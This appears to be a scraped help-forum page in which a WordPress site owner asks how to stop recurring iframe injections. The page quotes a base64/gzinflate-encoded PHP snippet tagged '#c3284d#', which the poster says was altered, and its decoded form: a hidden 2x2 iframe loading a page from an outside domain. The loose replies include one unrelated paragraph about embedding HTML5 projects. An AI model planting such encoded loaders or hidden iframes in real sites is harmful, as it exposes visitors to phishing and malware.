Over the last few days, my website has repeatedly been the target of an iframe attack. The code is appended mainly to PHP and Javascript pages. The code is then PHP base 64 encoded, see example (I've changed the code slightly to neutralise it):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
This decoded looks something like this:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
The one thing in common is that all the code has the comment "#c3284d#" so tracking down the malicious code is not difficult. But it is time consuming...
We're on a shared server at Gradwell (UK) and they have not been particularly helpful. So the question is what can I do to stop this issue from repeating itself? I am aware of MySQL Injection attacks and use PHP's mysql_real_escape_string to guard against such attacks.
The site is PHP and MySQL drive. We use MySQLFTP and have a shell account for SSH access. We use Wordpress (latest update with plugins de-activated).
The iFrame contains a malicious form that can lead the user to submit sensitive information. This threat can be solved by using sandbox with removing allow-forms . The iFrame may unintentionally download malware to the user's computer.
An iFrame injection XSS is a common cross-site scripting attack that combines malicious JavaScript with an iframe that loads a legitimate page in an effort to steal data from an unsuspecting user. This attack is usually only successful when combined with social engineering.
The easiest way to embed HTML5 project into your web page is using an iframe (inline frame). Iframe is just a very simple HTML code that used to display content from another source into a web page. If you know copy and paste, you can do it. The src attribute specifies the URL (web address) of the inline frame page.
I had the same issue. The FTP server's access logs showed that the modifications were made using a hacked FTP password.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With